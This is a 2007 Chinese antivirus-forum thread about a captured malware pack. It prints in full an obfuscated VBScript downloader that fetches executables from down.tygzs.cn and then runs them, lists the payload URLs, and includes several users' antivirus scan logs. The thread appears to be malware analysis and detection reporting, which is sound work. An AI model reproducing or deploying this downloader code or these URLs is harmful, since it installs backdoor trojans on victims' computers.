网上抓来的一包

欠妳緈諨

6个

1688388728

大蜘蛛

solcroft

1.exe解放了一个c:\a.vbs，竟然是vbs下载者，剩下的2.exe等都是这个鬼东西下的

http://down.tygzs.cn/dowm2321/2.exe
http://down.tygzs.cn/dowm2321/3.exe
http://down.tygzs.cn/dowm2321/4.exe
http://down.tygzs.cn/dowm2321/5.exe

1. On Error Resume Next
   
2. Set Post = CreateObject("Msxml2.XMLHTTP")
   
3. Set Shell = CreateObject("Wscript.Shell")
   
4. Set fso = CreateObject("Scripting.FileSystemObject")
   
5. If fso.FileExists("c:\a.vbs") Then fso.DeleteFile ("c:\a.vbs")
   
6. wscript.sleep 500
   
7. If fso.FileExists("C:\Documents and Settings\Virtual Machine\Desktop\1.exe") Then fso.DeleteFile ("C:\Documents and Settings\Virtual Machine\Desktop\1.exe")
   
8. Str = Array(80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,100,111,119,110,46,116,121,103,122,115,46,99,110,47,100,111,119,109,50,51,50,49,47,50,46,101,120,101,34,44,48)
   
9. Function Num2Str(Str):For I=0 To UBound(Str):Num2Str = Num2Str & Chr(Str(I)):Next:End Function
   
10. Execute Num2Str(Str)
    
11. Post.Send()
    
12. Set aGet = CreateObject("ADODB.Stream")
    
13. aGet.Mode = 3
    
14. aGet.Type = 1
    
15. aGet.Open()
    
16. S="614765742E577269746528506F73742E726573706F6E7365426F647929":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5)
    
17. LOOP:EXECUTE D
    
18. aGet.SaveToFile "c:\windows\1.exe",2
    
19. wscript.sleep 1000
    
20. Shell.Run ("c:\windows\1.exe")
    
21. Str = Array(80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,100,111,119,110,46,116,121,103,122,115,46,99,110,47,100,111,119,109,50,51,50,49,47,51,46,101,120,101,34,44,48)
    
22. Function Num2Str(Str):For I=0 To UBound(Str):Num2Str = Num2Str & Chr(Str(I)):Next:End Function
    
23. Execute Num2Str(Str)
    
24. Post.Send()
    
25. Set aGet = CreateObject("ADODB.Stream")
    
26. aGet.Mode = 3
    
27. aGet.Type = 1
    
28. aGet.Open()
    
29. S="614765742E577269746528506F73742E726573706F6E7365426F647929":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5)
    
30. LOOP:EXECUTE D
    
31. aGet.SaveToFile "c:\windows\2.exe",2
    
32. wscript.sleep 1000
    
33. Shell.Run ("c:\windows\2.exe")
    
34. Str = Array(80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,100,111,119,110,46,116,121,103,122,115,46,99,110,47,100,111,119,109,50,51,50,49,47,52,46,101,120,101,34,44,48)
    
35. Function Num2Str(Str):For I=0 To UBound(Str):Num2Str = Num2Str & Chr(Str(I)):Next:End Function
    
36. Execute Num2Str(Str)
    
37. Post.Send()
    
38. Set aGet = CreateObject("ADODB.Stream")
    
39. aGet.Mode = 3
    
40. aGet.Type = 1
    
41. aGet.Open()
    
42. S="614765742E577269746528506F73742E726573706F6E7365426F647929":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5)
    
43. LOOP:EXECUTE D
    
44. aGet.SaveToFile "c:\windows\3.exe",2
    
45. wscript.sleep 1000
    
46. Shell.Run ("c:\windows\3.exe")
    
47. Str = Array(80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,100,111,119,110,46,116,121,103,122,115,46,99,110,47,100,111,119,109,50,51,50,49,47,53,46,101,120,101,34,44,48)
    
48. Function Num2Str(Str):For I=0 To UBound(Str):Num2Str = Num2Str & Chr(Str(I)):Next:End Function
    
49. Execute Num2Str(Str)
    
50. Post.Send()
    
51. Set aGet = CreateObject("ADODB.Stream")
    
52. aGet.Mode = 3
    
53. aGet.Type = 1
    
54. aGet.Open()
    
55. S="614765742E577269746528506F73742E726573706F6E7365426F647929":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5)
    
56. LOOP:EXECUTE D
    
57. aGet.SaveToFile "c:\windows\4.exe",2
    
58. wscript.sleep 1000
    
59. Shell.Run ("c:\windows\4.exe")

复制代码

[ 本帖最后由 solcroft 于 2007-6-2 16:12 编辑 ]

wangjay1980

detected: Trojan program Backdoor.Win32.Agent.ahj        File: C:\Documents and Settings\Owner\×ÀÃæ\×ÀÃæ.rar/2.exe
detected: Trojan program Backdoor.Win32.Agent.ahj        File: C:\Documents and Settings\Owner\×ÀÃæ\×ÀÃæ.rar/3.exe
detected: Trojan program Backdoor.Win32.Agent.ahj        File: C:\Documents and Settings\Owner\×ÀÃæ\×ÀÃæ.rar/4.exe
detected: Trojan program Backdoor.Win32.Agent.ahj        File: C:\Documents and Settings\Owner\×ÀÃæ\×ÀÃæ.rar/5.exe
detected: malware Exploit.Win32.IMG-ANI.gen (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\×ÀÃæ.rar/ah.c

taihuxian

Virus: Backdoor.Win32.Agent.ahj (4x), Exploit.Win32.IMG-ANI.gen

Virus found while downloading Web content.

Address: bbs.kafan.cn

fanrubin

微点全报，有的报已知，有的报未知木马

英仔

avg anti 只得一個

onesand

tart of the scan: 2007年6月9日  13:02

Starting the file scan:

Begin scan in 'C:\Documents and Settings\huaxun\桌面\桌面.rar'
C:\Documents and Settings\huaxun\桌面\
  桌面.rar
    [0] Archive type: RAR
    --> 1.exe
        [DETECTION] Is the Trojan horse TR/Dldr.VB.ayk
        [WARNING]   Infected files in archives cannot be repaired!
    --> 2.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 3.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 4.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 5.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> ah.c
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was moved to '4698cbc0.qua'!


End of the scan: 2007年6月9日  13:02
Used time: 00:08 min